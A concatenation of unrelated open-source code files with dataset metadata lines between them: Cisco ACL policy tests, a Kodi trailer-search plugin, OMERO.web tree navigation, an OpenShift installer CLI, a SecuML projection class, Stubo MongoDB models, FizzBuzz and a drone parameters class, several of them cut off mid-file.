action:: accept
}
"""
GOOD_TERM_3 = """
term good-term-3 {
protocol:: tcp
option:: tcp-established
action:: accept
}
"""
GOOD_TERM_4 = """
term good-term-4 {
protocol:: tcp
logging:: true
action:: accept
}
"""
GOOD_TERM_5 = """
term good-term-5 {
verbatim:: cisco "mary had a little lamb"
verbatim:: iptables "mary had second lamb"
verbatim:: juniper "mary had third lamb"
}
"""
GOOD_TERM_6 = """
term good-term-6 {
destination-address:: ANY
action:: accept
}
"""
GOOD_TERM_7 = """
term good-term {
protocol:: vrrp
action:: accept
}
"""
GOOD_TERM_8 = """
term good-term {
protocol:: tcp
destination-address:: SOME_HOST
action:: accept
}
"""
GOOD_TERM_9 = """
term good-term-9 {
protocol:: tcp udp
option:: established
action:: accept
}
"""
GOOD_TERM_10 = """
term good-term-10 {
protocol:: icmp
icmp-type:: echo-reply unreachable time-exceeded
action:: accept
}
"""
GOOD_TERM_11 = """
term good-term-11 {
protocol:: icmpv6
icmp-type:: echo-reply destination-unreachable time-exceeded
action:: accept
}
"""
GOOD_TERM_12 = """
term good-term-12 {
action:: accept
}
"""
GOOD_TERM_13 = """
term good-term-13 {
owner:: foo@google.com
action:: accept
}
"""
GOOD_TERM_14 = """
term good-term-14 {
protocol:: tcp
destination-address:: SOME_HOST
destination-port:: CONSECUTIVE_PORTS
action:: accept
}
"""
GOOD_TERM_15 = """
term good-term-15 {
protocol:: hopopt
action:: accept
}
"""
GOOD_TERM_16 = """
term good-term-16 {
protocol:: tcp
action:: accept
dscp-match:: 42
}
"""
GOOD_TERM_17 = """
term good-term-17 {
protocol:: tcp udp
policer:: batman
option:: established
action:: accept
}
"""
GOOD_TERM_18 = """
term good-term-18 {
source-address:: SOME_HOST
destination-address:: SOME_HOST
action:: accept
}
"""
LONG_COMMENT_TERM = """
term long-comment-term {
comment:: "%s "
action:: accept
}
"""
SUPPORTED_TOKENS = {
'action',
'address',
'comment',
'destination_address',
'destination_address_exclude',
'destination_port',
'dscp_match',
'expiration',
'icmp_type',
'logging',
'name',
'option',
'owner',
'platform',
'platform_exclude',
'protocol',
'source_address',
'source_address_exclude',
'source_port',
'translated',
'verbatim',
}
SUPPORTED_SUB_TOKENS = {
'action': {'accept', 'deny', 'reject', 'next',
'reject-with-tcp-rst'},
'icmp_type': {
'alternate-address',
'certification-path-advertisement',
'certification-path-solicitation',
'conversion-error',
'destination-unreachable',
'echo-reply',
'echo-request',
'mobile-redirect',
'home-agent-address-discovery-reply',
'home-agent-address-discovery-request',
'icmp-node-information-query',
'icmp-node-information-response',
'information-request',
'inverse-neighbor-discovery-advertisement',
'inverse-neighbor-discovery-solicitation',
'mask-reply',
'mask-request',
'information-reply',
'mobile-prefix-advertisement',
'mobile-prefix-solicitation',
'multicast-listener-done',
'multicast-listener-query',
'multicast-listener-report',
'multicast-router-advertisement',
'multicast-router-solicitation',
'multicast-router-termination',
'neighbor-advertisement',
'neighbor-solicit',
'packet-too-big',
'parameter-problem',
'redirect',
'redirect-message',
'router-advertisement',
'router-renumbering',
'router-solicit',
'router-solicitation',
'source-quench',
'time-exceeded',
'timestamp-reply',
'timestamp-request',
'unreachable',
'version-2-multicast-listener-report',
},
'option': {'established',
'tcp-established'}
}
# Print an info message when a term is set to expire in that many weeks.
# This is normally passed from command line.
EXP_INFO = 2
class CiscoTest(unittest.TestCase):
def setUp(self):
self.naming = mock.create_autospec(naming.Naming)
def testIPVersion(self):
self.naming.GetNetAddr.return_value = [nacaddr.IP('0.0.0.0/0'),
nacaddr.IP('::/0')]
pol = policy.ParsePolicy(GOOD_HEADER + GOOD_TERM_6, self.naming)
acl = cisco.Cisco(pol, EXP_INFO)
# check if we've got a v6 address in there.
self.failIf('::' in str(acl), str(acl))
self.naming.GetNetAddr.assert_called_once_with('ANY')
def testOptions(self):
self.naming.GetNetAddr.return_value = [nacaddr.IP('10.0.0.0/8')]
self.naming.GetServiceByProto.return_value = ['80']
acl = cisco.Cisco(policy.ParsePolicy(GOOD_HEADER + GOOD_TERM_2,
self.naming), EXP_INFO)
# this is a hacky sort of way
|
neno1978/pelisalacarta
|
python/main-classic/channels/trailertools.py
|
Python
|
gpl-3.0
| 26,400
| 0.005538
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------
# pelisalacarta 4
# Copyright 2015 tvalacarta@gmail.com
# http://blog.tvalacarta.info/plugin-xbmc/pelisalacarta/
#
# Distributed under the terms of GNU General Public License v3 (GPLv3)
# http://www.gnu.org/licenses/gpl-3.0.html
# ------------------------------------------------------------
# This file is part of pelisalacarta 4.
#
# pelisalacarta 4 is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# pelisalacarta 4 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with pelisalacarta 4. If not, see <http://www.gnu.org/licenses/>.
# --------------------------------------------------------------------------------
# Search trailers from youtube, filmaffinity, abandomoviez, vimeo, etc...
# --------------------------------------------------------------------------------
import re
import urllib
import urlparse
from core import config
from core import jsontools
from core import logger
from core import scrapertools
from core import servertools
from core.item import Item
from platformcode import platformtools
result = None
window_select = []
# Whether or not to enable the manual search option
if config.get_platform() != "plex":
keyboard = True
else:
keyboard = False
def buscartrailer(item, trailers=[]):
logger.info()
# List of actions when run from the context menu
if item.action == "manual_search" and item.contextual:
itemlist = manual_search(item)
item.contentTitle = itemlist[0].contentTitle
elif 'search' in item.action and item.contextual:
itemlist = globals()[item.action](item)
else:
# The Search Trailer option is removed from the context menu to avoid redundancy
if type(item.context) is str and "buscar_trailer" in item.context:
item.context = item.context.replace("buscar_trailer", "")
elif type(item.context) is list and "buscar_trailer" in item.context:
item.context.remove("buscar_trailer")
item.text_color = ""
itemlist = []
if item.contentTitle != "":
item.contentTitle = item.contentTitle.strip()
elif keyboard:
fulltitle = re.sub('\[\/*(B|I|COLOR)\s*[^\]]*\]', '', item.fulltitle.strip())
item.contentTitle = platformtools.dialog_input(default=fulltitle, heading="Introduce el título a buscar")
if item.contentTitle is None:
item.contentTitle = fulltitle
else:
item.contentTitle = item.contentTitle.strip()
else:
fulltitle = re.sub('\[\/*(B|I|COLOR)\s*[^\]]*\]', '', item.fulltitle.strip())
item.contentTitle = fulltitle
item.year = item.infoLabels['year']
logger.info("Búsqueda: %s" % item.contentTitle)
logger.info("Año: %s" % item.year)
if item.infoLabels['trailer'] and not trailers:
url = item.infoLabels['trailer']
if "youtube" in url:
url = url.replace("embed/", "watch?v=")
titulo, url, server = servertools.findvideos(url)[0]
title = "Trailer por defecto [" + server + "]"
itemlist.append(item.clone(title=title, url=url, server=server, action="play"))
if item.show or item.infoLabels['tvshowtitle'] or item.contentType != "movie":
tipo = "tv"
else:
tipo = "movie"
try:
if not trailers:
itemlist.extend(tmdb_trailers(item, tipo))
else:
for trailer in trailers:
title = trailer['name'] + " [" + trailer['size'] + "p] (" + trailer['language'].replace("en", "ING")\
.replace("es", "ESP")+") [tmdb/youtube]"
itemlist.append(item.clone(action="play", title=title, url=trailer['url'], server="youtube"))
except:
import traceback
logger.error(traceback.format_exc())
if item.contextual:
title = "[COLOR green]%s[/COLOR]"
else:
title = "%s"
itemlist.append(item.clone(title=title % "Búsqueda en Youtube", action="youtube_search",
text_color="green"))
itemlist.append(item.clone(title=title % "Búsqueda en Filmaffinity",
action="filmaffinity_search", text_color="green"))
# If it is a TV show, the Abandomoviez search option is not included
if not item.show and not item.infoLabels['tvshowtitle']:
itemlist.append(item.clone(title=title % "Búsqueda en Abandomoviez",
action="abandomoviez_search", text_color="green"))
itemlist.append(item.clone(title=title % "Búsqueda en Jayhap (Youtube, Vimeo & Dailymotion)",
action="jayhap_search", text_color="green"))
if item.contextual:
global window_select, result
select = Select("DialogSelect.xml", config.get_runtime_path(), item=item, itemlist=itemlist, caption="Buscando: "+item.contentTitle)
window_select.append(select)
select.doModal()
if item.windowed:
return result, window_select
else:
return itemlist
def manual_search(item):
logger.info()
texto
|
= platformtools.dialog_input(default=item.contentTitle, heading=config.get_localized_string(30112))
if texto is not None:
if item.extra == "abandomoviez":
return abandomoviez_search(item.clone(contentTitle=texto, page="", year=""))
el
|
if item.extra == "youtube":
return youtube_search(item.clone(contentTitle=texto, page=""))
elif item.extra == "filmaffinity":
return filmaffinity_search(item.clone(contentTitle=texto, page="", year=""))
elif item.extra == "jayhap":
return jayhap_search(item.clone(contentTitle=texto))
def tmdb_trailers(item, tipo="movie"):
logger.info()
from core.tmdb import Tmdb
itemlist = []
tmdb_search = None
if item.infoLabels['tmdb_id']:
tmdb_search = Tmdb(id_Tmdb=item.infoLabels['tmdb_id'], tipo=tipo, idioma_busqueda='es')
elif item.infoLabels['year']:
tmdb_search = Tmdb(texto_buscado=item.contentTitle, tipo=tipo, year=item.infoLabels['year'])
if tmdb_search:
for result in tmdb_search.get_videos():
title = result['name'] + " [" + result['size'] + "p] (" + result['language'].replace("en", "ING")\
.replace("es", "ESP")+") [tmdb/youtube]"
itemlist.append(item.clone(action="play", title=title, url=result['url'], server="youtube"))
return itemlist
def youtube_search(item):
logger.info()
itemlist = []
titulo = item.contentTitle
if item.extra != "youtube":
titulo += " trailer"
# Check whether this is a search from scratch or comes from the Next option
if item.page != "":
data = scrapertools.downloadpage(item.page)
else:
titulo = urllib.quote(titulo)
titulo = titulo.replace("%20", "+")
data = scrapertools.downloadpage("https://www.youtube.com/results?sp=EgIQAQ%253D%253D&q="+titulo)
data = re.sub(r"\n|\r|\t|\s{2}| ", "", data)
patron = '<span class="yt-thumb-simple">.*?(?:src="https://i.ytimg.com/|data-thumb="https://i.ytimg.com/)([^"]+)"' \
'.*?<h3 class="yt-lockup-title ">.*?<a href="([^"]+)".*?title="([^"]+)".*?' \
'</a><span class="accessible-description".*?>.*?(\d+:\d+)'
matches = scrapertools.find_multiple_matches(data, patron)
for scrapedthumbnail, scrapedurl, scrapedtitle, scrapedduration in matches:
scra
|
CodeTengu/jokekappa
|
tests/test_core.py
|
Python
|
mit
| 127
| 0
|
# coding: u
|
tf-8
import unittest
import jokekappa
class VoidTest(unittest.TestCase):
def test_
|
void(self):
pass
|
simleo/openmicroscopy
|
components/tools/OmeroWeb/omeroweb/webclient/show.py
|
Python
|
gpl-2.0
| 37,362
| 0.00008
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2014 University of Dundee & Open Microscopy Environment.
# All rights reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
"""
Generic functionality for handling particular links and "showing" objects
in the OMERO.web tree view.
"""
import omero
import re
from omero.rtypes import rint, rlong
from django.core.urlresolvers import reverse
from copy import deepcopy
from django.conf import settings
class IncorrectMenuError(Exception):
"""Exception to signal that we are on the wrong menu."""
def __init__(self, uri):
"""
Constructs a new Exception instance.
@param uri URI to redirect to.
@type uri String
"""
super(Exception, self).__init__()
self.uri = uri
class Show(object):
"""
This object is used by most of the top-level pages. The "show" and
"path" query strings are used by this object to both direct OMERO.web to
the correct locations in the hierarchy and select the correct objects
in that hierarchy.
"""
# List of prefixes that are at the top level of the tree
TOP_LEVEL_PREFIXES = ('project', 'screen', 'tagset')
# List of supported object types
SUPPORTED_OBJECT_TYPES = (
'project', 'dataset', 'image', 'screen', 'plate', 'tag',
'acquisition', 'run', 'well', 'tagset'
)
# Regular expression which declares the format for a "path" used either
# in the "path" or "show" query string. No modifications should be made
# to this regex without corresponding unit tests in
# "tests/unit/test_show.py".
PATH_REGEX = re.compile(
r'(?P<object_type>\w+)\.?(?P<key>\w+)?[-=](?P<value>[^\|]*)\|?'
)
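# Worked example (added comment, not in the original source): a "show" value
# such as "project.id-51|dataset-42" yields two PATH_REGEX matches; the first
# has object_type='project', key='id', value='51', the second has
# object_type='dataset', key=None (later defaulted to 'id') and value='42'.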
# Regular expression for matching Well names
WELL_REGEX = re.compile(
'^(?:(?P<alpha_row>[a-zA-Z]+)(?P<digit_column>\d+))|'
'(?:(?P<digit_row>\d+)(?P<alpha_column>[a-zA-Z]+))$'
)
def __init__(self, conn, request, menu):
"""
Constructs a Show instance. The instance will not be fully
initialised until the first retrieval of the L{Show.first_selected}
property.
@param conn OMERO gateway.
@type conn L{omero.gateway.BlitzGateway}
@param request Django HTTP request.
@type request L{django.http.HttpRequest}
@param menu Literal representing the current menu we are on.
@type menu String
"""
# The list of "paths" ("type-id") we have been requested to
# show/select in the user interface. May be modified if one or
# more of the elements is not in the tree. This is currently the
# case for all Screen-Plate-Well hierarchy elements below Plate
# (Well for example).
self._initially_select = list()
# The nodes of the tree that will be initially open based on the
# nodes that are initially selected.
self._initially_open = list()
# The owner of the node closest to the root of the tree from the
# list of initially open nodes.
self._initially_open_owner = None
# First selected node from the requested initially open "paths"
# that is first loaded on first retrieval of the "first_selected"
# property.
self._first_selected = None
self.conn = conn
self
|
.request = request
self.menu = menu
path = self.request.GET.get('path', '').split('|')[-1]
self._add_if_supported(path)
show = self.request.GET.get('show', '')
for path in show.split('|'):
self._add_if_supported(path)
def _add_if_supported(self, path):
"""A
|
dds a path to the initially selected list if it is supported."""
m = self.PATH_REGEX.match(path)
if m is None:
return
object_type = m.group('object_type')
key = m.group('key')
value = m.group('value')
if key is None:
key = 'id'
if object_type in self.SUPPORTED_OBJECT_TYPES:
# 'run' is an alternative for 'acquisition'
object_type = object_type.replace('run', 'acquisition')
self._initially_select.append(
'%s.%s-%s' % (object_type, key, value)
)
def _load_tag(self, attributes):
"""
Loads a Tag based on a certain set of attributes from the server.
@param attributes Set of attributes to filter on.
@type attributes L{dict}
"""
# Tags have an "Annotation" suffix added to the object name so
# need to be loaded differently.
return next(self.conn.getObjects(
"TagAnnotation", attributes=attributes
))
def get_well_row_column(self, well):
"""
Retrieves a tuple of row and column as L{int} for a given Well name
("A1" or "1A") string.
@param well Well name string to retrieve the row and column tuple for.
@type well L{str}
"""
m = self.WELL_REGEX.match(well)
if m is None:
return None
# We are using an algorithm that expects alpha columns and digit
# rows (like a spreadsheet). is_reversed will be True if those
# conditions are not met, signifying that the row and column
# calculated needs to be reversed before returning.
is_reversed = False
if m.group('alpha_row') is not None:
a = m.group('alpha_row').upper()
b = m.group('digit_column')
is_reversed = True
else:
a = m.group('alpha_column').upper()
b = m.group('digit_row')
# Convert base26 column string to number. Adapted from XlsxWriter:
# * https://github.com/jmcnamara/XlsxWriter
# * xlsxwriter/utility.py
n = 0
column = 0
for character in reversed(a):
column += (ord(character) - ord('A') + 1) * (26 ** n)
n += 1
# Convert 1-index to zero-index
row = int(b) - 1
column -= 1
if is_reversed:
return column, row
return row, column
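# Worked examples (added comment, not in the original file): both "A1" and
# "1A" return (0, 0); "C2" returns (2, 1) while "2C" returns (1, 2); a column
# string of "AA" contributes index (1*26 + 1) - 1 = 26.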
def _load_well(self, attributes):
"""
Loads a Well based on a certain set of attributes from the server.
@param attributes Set of attributes to filter on.
@type attributes L{dict}
"""
if 'id' in attributes:
return self.conn.getObject('Well', attributes=attributes)
if 'name' in attributes:
row, column = self.get_well_row_column(attributes['name'])
path = self.request.GET.get('path', '')
for m in self.PATH_REGEX.finditer(path):
object_type = m.group('object_type')
# May have 'run' here rather than 'acquisition' because
# the path will not have been validated and replaced.
if object_type not in ('plate', 'run', 'acquisition'):
continue
# 'run' is an alternative for 'acquisition'
object_type = object_type.replace('run', 'acquisition')
# Try and load the potential parent first
key = m.group('key')
value = m.group('value')
if key is None:
key = 'id'
if key == 'id':
value = long(value)
parent_attributes = {key: value}
parent, = self.conn.getObjects(
object_type, attributes=parent_attributes
)
|
menren/openshift-ansible
|
utils/src/ooinstall/cli_installer.py
|
Python
|
apache-2.0
| 31,431
| 0.003213
|
# TODO: Temporarily disabled due to importing old code into openshift-ansible
# repo. We will work on these over time.
# pylint: disable=bad-continuation,missing-docstring,no-self-use,invalid-name,no-value-for-parameter
import click
import os
import re
import sys
from ooinstall import openshift_ansible
from ooinstall import OOConfig
from ooinstall.oo_config import OOConfigInvalidHostError
from ooinstall.oo_config import Host
from ooinstall.variants import find_variant, get_variant_version_combos
DEFAULT_ANSIBLE_CONFIG = '/usr/share/atomic-openshift-utils/ansible.cfg'
DEFAULT_PLAYBOOK_DIR = '/usr/share/ansible/openshift-ansible/'
def validate_ansible_dir(path):
if not path:
raise click.BadParameter('An ansible path must be prov
|
ided')
return path
# if not os.path.exists(path)):
# raise click.BadParameter("Path \"{}\" doesn't exist".format(path))
def is_valid_hostname(hostname):
if not hostname or len(hostname) > 255:
return False
if hostname[-1] == ".":
hostname = hostname[:-1] # strip exactly one dot fro
|
m the right, if present
allowed = re.compile(r"(?!-)[A-Z\d-]{1,63}(?<!-)$", re.IGNORECASE)
return all(allowed.match(x) for x in hostname.split("."))
def validate_prompt_hostname(hostname):
if '' == hostname or is_valid_hostname(hostname):
return hostname
raise click.BadParameter('"{}" appears to be an invalid hostname. ' \
'Please double-check this value ' \
'and re-enter it.'.format(hostname))
def get_ansible_ssh_user():
click.clear()
message = """
This installation process will involve connecting to remote hosts via ssh. Any
account may be used; however, if a non-root account is used it must have
passwordless sudo access.
"""
click.echo(message)
return click.prompt('User for ssh access', default='root')
def list_hosts(hosts):
hosts_idx = range(len(hosts))
for idx in hosts_idx:
click.echo(' {}: {}'.format(idx, hosts[idx]))
def delete_hosts(hosts):
while True:
list_hosts(hosts)
del_idx = click.prompt('Select host to delete, y/Y to confirm, ' \
'or n/N to add more hosts', default='n')
try:
del_idx = int(del_idx)
hosts.remove(hosts[del_idx])
except IndexError:
click.echo("\"{}\" doesn't match any hosts listed.".format(del_idx))
except ValueError:
try:
response = del_idx.lower()
if response in ['y', 'n']:
return hosts, response
click.echo("\"{}\" doesn't coorespond to any valid input.".format(del_idx))
except AttributeError:
click.echo("\"{}\" doesn't coorespond to any valid input.".format(del_idx))
return hosts, None
def collect_hosts(version=None, masters_set=False, print_summary=True):
"""
Collect host information from user. This will later be filled in using
ansible.
Returns: a list of host information collected from the user
"""
click.clear()
click.echo('*** Host Configuration ***')
message = """
You must now specify the hosts that will compose your OpenShift cluster.
Please enter an IP or hostname to connect to for each system in the cluster.
You will then be prompted to identify what role you would like this system to
serve in the cluster.
OpenShift Masters serve the API and web console and coordinate the jobs to run
across the environment. If desired you can specify multiple Master systems for
an HA deployment, in which case you will be prompted to identify a *separate*
system to act as the load balancer for your cluster after all Masters and Nodes
are defined.
If only one Master is specified, an etcd instance embedded within the OpenShift
Master service will be used as the datastore. This can be later replaced with a
separate etcd instance if desired. If multiple Masters are specified, a
separate etcd cluster will be configured with each Master serving as a member.
Any Masters configured as part of this installation process will also be
configured as Nodes. This is so that the Master will be able to proxy to Pods
from the API. By default this Node will be unschedulable but this can be changed
after installation with 'oadm manage-node'.
OpenShift Nodes provide the runtime environments for containers. They will
host the required services to be managed by the Master.
http://docs.openshift.com/enterprise/latest/architecture/infrastructure_components/kubernetes_infrastructure.html#master
http://docs.openshift.com/enterprise/latest/architecture/infrastructure_components/kubernetes_infrastructure.html#node
"""
click.echo(message)
hosts = []
more_hosts = True
num_masters = 0
while more_hosts:
host_props = {}
host_props['connect_to'] = click.prompt('Enter hostname or IP address',
value_proc=validate_prompt_hostname)
if not masters_set:
if click.confirm('Will this host be an OpenShift Master?'):
host_props['master'] = True
num_masters += 1
if version == '3.0':
masters_set = True
host_props['node'] = True
#TODO: Reenable this option once container installs are out of tech preview
#rpm_or_container = click.prompt('Will this host be RPM or Container based (rpm/container)?',
# type=click.Choice(['rpm', 'container']),
# default='rpm')
#if rpm_or_container == 'container':
# host_props['containerized'] = True
#else:
# host_props['containerized'] = False
host_props['containerized'] = False
host = Host(**host_props)
hosts.append(host)
if print_summary:
print_installation_summary(hosts)
# If we have one master, this is enough for an all-in-one deployment,
# thus we can start asking if you wish to proceed. Otherwise we assume
# you must.
if masters_set or num_masters != 2:
more_hosts = click.confirm('Do you want to add additional hosts?')
if num_masters >= 3:
collect_master_lb(hosts)
return hosts
def print_installation_summary(hosts):
"""
Displays a summary of all hosts configured thus far, and what role each
will play.
Shows total nodes/masters, hints for performing/modifying the deployment
with additional setup, warnings for invalid or sub-optimal configurations.
"""
click.clear()
click.echo('*** Installation Summary ***\n')
click.echo('Hosts:')
for host in hosts:
print_host_summary(hosts, host)
masters = [host for host in hosts if host.master]
nodes = [host for host in hosts if host.node]
dedicated_nodes = [host for host in hosts if host.node and not host.master]
click.echo('')
click.echo('Total OpenShift Masters: %s' % len(masters))
click.echo('Total OpenShift Nodes: %s' % len(nodes))
if len(masters) == 1:
ha_hint_message = """
NOTE: Add a total of 3 or more Masters to perform an HA installation."""
click.echo(ha_hint_message)
elif len(masters) == 2:
min_masters_message = """
WARNING: A minimum of 3 masters are required to perform an HA installation.
Please add one more to proceed."""
click.echo(min_masters_message)
elif len(masters) >= 3:
ha_message = """
NOTE: Multiple Masters specified, this will be an HA deployment with a separate
etcd cluster. You will be prompted to provide the FQDN of a load balancer once
finished entering hosts."""
click.echo(ha_message)
dedicated_nodes_message = """
WARNING: Dedicated Nodes are recommended for an HA deployment. If no dedicated
Nodes are specified, each configured Master will be marked as a schedulable
Node."""
min_ha_nodes_message = """
WARNING: A minimum of 3 dedicated Nodes are recommended for an HA
deployment."""
if len(dedicated_nodes) == 0:
click.e
|
grollins/foldkin
|
foldkin/simple/__init__.py
|
Python
|
bsd-2-clause
| 27
| 0
|
f
|
rom simple_model import
|
*
|
ah-anssi/SecuML
|
SecuML/core/DimensionReduction/Algorithms/Projection/Itml.py
|
Python
|
gpl-2.0
| 1,021
| 0
|
# SecuML
# Copyright (C) 2016 ANSSI
#
# SecuML is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# SecuML is distributed in the hope that it will be useful,
|
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with SecuML. If not, see <http://www.gnu.org/licenses/>.
import metric_learn
import numpy as np
from .SemiSupervisedProjection import SemiSupervisedProjection
class Itml(SemiSupervisedProjection):
def __ini
|
t__(self, conf):
SemiSupervisedProjection.__init__(self, conf)
self.projection = metric_learn.itml.ITML_Supervised()
def setProjectionMatrix(self):
self.projection_matrix = np.transpose(
self.pipeline.named_steps['projection'].transformer())
|
Stub-O-Matic-BA/stubo-app
|
stubo/model/db.py
|
Python
|
gpl-3.0
| 23,064
| 0.002688
|
"""
:copyright: (c) 2015 by OpenCredo.
:license: GPLv3, see LICENSE for more details.
"""
from pymongo import MongoClient, DESCENDING, ASCENDING
import logging
from bson.objectid import ObjectId
from stubo.utils import asbool
from stubo.model.stub import Stub
import hashlib
import time
import motor
import os
default_env = {
'port': 27017,
'max_pool_size': 20,
'tz_aware': True,
'db': 'stubodb'
}
def coerce_mongo_param(k, v):
if k in ('port', 'max_pool_size'):
return int(v)
elif k in ('tz_aware',):
return asbool(v)
return v
log = logging.getLogger(__name__)
mongo_client = None
def motor_driver(settings):
"""
Returns an asynchronous Motor client. If a user and password are provided in the config file, an authenticated connection is returned.
:param settings:
:return:
"""
# checking for environment variables
mongo_uri = os.getenv("MONGO_URI")
mongo_db = os.getenv("MONGO_DB")
if mongo_uri and mongo_db:
client = motor.MotorClient(mongo_uri)
log.info("MongoDB environment variables found: %s!" % mongo_uri)
return client[mongo_db]
# environment variables not found, looking for details from configuration file
user = settings.get('mongo.user', None)
password = settings.get('mongo.password', None)
if user and password:
uri = "mongodb://{user}:{password}@{host}:{port}/{database_name}".format(
user=user,
password=password,
host=settings['mongo.host'],
port=settings['mongo.port'],
database_name=settings['mongo.db']
)
client = motor.MotorClient(uri)
else:
client = motor.MotorClient(settings['mongo.host'], int(settings['mongo.port']))
return client[settings['mongo.db']]
def get_mongo_client():
return mongo_client
def get_connection(env=None):
"""
Gets a MongoDB connection. If a user and password are provided, it authenticates (logs in).
:param env: dictionary, example:
{'host': 'ds045454.mongolab.com',
'tz_aware': True,
'max_pool_size': 10,
'port': 45454}
:return: MongoClient
"""
# checking for environment variables
mongo_uri = os.getenv("MONGO_URI")
mongo_db = os.getenv("MONGO_DB")
if mongo_uri and mongo_db:
client = MongoClient(mongo_uri)
log.info("MongoDB environment variables found: %s!" % mongo_uri)
return client[mongo_db]
# environment variables not found, looking for details from configuration file
env = env or default_env
_env = env.copy()
dbname = _env.pop('db', None)
# if auth details supplied - getting details
user = password = None
if 'user' in _env:
user = _env.pop('user')
if 'password' in _env:
password = _env.pop('password')
client = MongoClient(**_env)
if dbname:
log.debug('using db={0}'.format(dbname))
client = getattr(client, dbname)
# authenticating
if user and password:
# if fails - throws exception which will be handled in run_stubo.py
client.authenticate(user, password)
log.info("Login to MongoDB successful!")
return client
class Scenario(object):
def __init__(self, db=None):
self.db = db or mongo_client
assert self.db
def get_stubs(self, name=None):
if name:
filter = {'scenario': name}
return self.db.scenario_stub.find(filter)
else:
return self.db.scenario_stub.find()
def get_pre_stubs(self, name=None):
if name:
query = {'scenario': name}
return self.db.pre_scenario_stub.find(query)
else:
return self.db.scenario_pre_stub.find()
def stub_count(self, name):
return self.get_stubs(name).count()
def get(self, name):
return self.db.scenario.find_one({'name': name})
def get_all(self, name=None):
if name:
cursor = self.db.scenario.find({'name': name})
else:
cursor = self.db.scenario.find()
return cursor
def insert(self, **kwargs):
return self.db.scenario.insert(kwargs)
def change_name(self, name, new_name):
"""
Rename scenario and all stubs
:param name: current scenario name
:param new_name: new scenario name
:return: statistics, how many stubs were changed
"""
# updating scenario stub collection. With the positional update() signature you have
# to pass every optional parameter up to the one you actually want; in our case that
# is the fourth one, "multi" = True
# update(spec, document[, upsert=False[,
# manipulate=False[, safe=None[, multi=False[, check_keys=True[, **kwargs]]]]]])
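# Equivalent keyword form, shown here only as an illustration (assumes a
# pymongo 2.x Collection.update() that accepts multi as a keyword argument):
#   self.db.scenario_stub.update({'scenario': name},
#                                {'$set': {'scenario': new_name}}, multi=True)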
response = {
'Old name': name,
"New name": new_name
}
try:
result = self.db.scenario_stub.update(
{'scenario': name}, {'$set': {'scenario': new_name}}, False, False, None, True)
try:
response['Stubs changed'] = result['nModified']
except KeyError:
# older versions of mongodb returns 'n' instead of 'nModified'
response['Stubs changed'] = result['n']
except Exception as ex1:
# this is probably KeyError, leaving Exception for debugging purposes
log.debug("Could not get STUB nModified key, result returned: %s. Error: %s" % (result, ex1))
except Exception as ex:
log.debug("Could not update scenario stub, got error: %s " % ex)
response['Stubs changed'] = 0
# updating pre stubs
try:
result = self.db.scenario_pre_stub.update(
{'scenario': name}, {'$set': {'scenario': new_name}}, False, False, None, True)
try:
response['Pre stubs changed'] = result['nModified']
except KeyError:
# older versions of mongodb returns 'n' instead of 'nModified'
response['Pre stubs changed'] = result['n']
|
except Exception as ex1:
log.debug("Could not get PRE STUB nModified key, result returned: %s. Error: %s" % (result, ex1))
except Exception as ex:
log.debug("Could not update scenario pre stub, got error: %s" % ex)
response['Pre stubs changed'] = 0
try:
# updating scenario itself
result = self.db.scenario.update({'name': name}, {'name': new_name})
try:
response['Scenarios cha
|
nged'] = result['nModified']
except KeyError:
# older versions of mongodb returns 'n' instead of 'nModified'
response['Scenarios changed'] = result['n']
except Exception as ex1:
log.debug("Could not get SCENARIO nModified key, result returned: %s. Error: %s" % (result, ex1))
except Exception as ex:
log.debug("Could not update scenario, got error: %s" % ex)
response['Scenarios changed'] = 0
return response
def recorded(self, name=None):
"""
Calculates scenario recorded date. If name is not supplied - returns a dictionary with scenario name and
recorded date:
{ 'scenario_1': '2015-05-07',
'scenario_2': '2015-05-07'}
If a name is supplied - returns recorded date string (since MongoDB does not support DateTimeField).
:param name: optional parameter to get recorded date for specific scenario
:return: <dict> - if name is not supplied, <string> with date - if scenario name supplied.
"""
start_time = time.time()
pipeline = [
{'$group': {
'_id': '$scenario',
'recorded': {'$max': '$recorded'}}}]
# use the pipe to calculate latest date
try:
result = self.db.command('aggregate', 'scenario_stub', pipeline=pipeline)['result']
except KeyError as ex:
log.error(ex)
return None
except Exception as ex:
log.error("Go
|
tferreira/Flask-Redis
|
application/models.py
|
Python
|
mit
| 170
| 0
|
# from index import db
# class MyObject():
|
# def __init__(self):
# pass
# @staticmethod
# def get_something(arg1, arg2):
# return something
| |
CorySpitzer/FizzBuzz
|
everest/FizzBuzz.py
|
Python
|
mit
| 175
| 0.091429
|
n = 1
while n <= 100:
if (n % 3 == 0 and n % 5
|
== 0):
print "FizzBuzz"
elif (n % 3 == 0)
|
:
print "Fizz"
elif (n % 5 == 0):
print "Buzz"
else:
print n
n += 1
|
LeonNie52/dk-plus
|
test files/params.py
|
Python
|
gpl-3.0
| 13,072
| 0.008415
|
"""
The parameters class. It is initialized with the vehicle's attributes at time of construction
but it is constantly updated through attribute listeners after calling the add_listeners() function
These parameters can provide the basic info for a future collision avoidance scheme.
Any functions that can refer to the parameters can be written here.
Added support for "dummy" initialization for experimental purposes
"""
from dronekit import connect, Command, VehicleMode, LocationGlobalRelative, LocationGlobal, socket
import uuid, random, time
class Params:
def __init__(self, network=None, vehicle=None, dummy=False):
if dummy:
self.ID = random.randint(1000, 9999)
self.last_recv = time.time()
self.version = 1
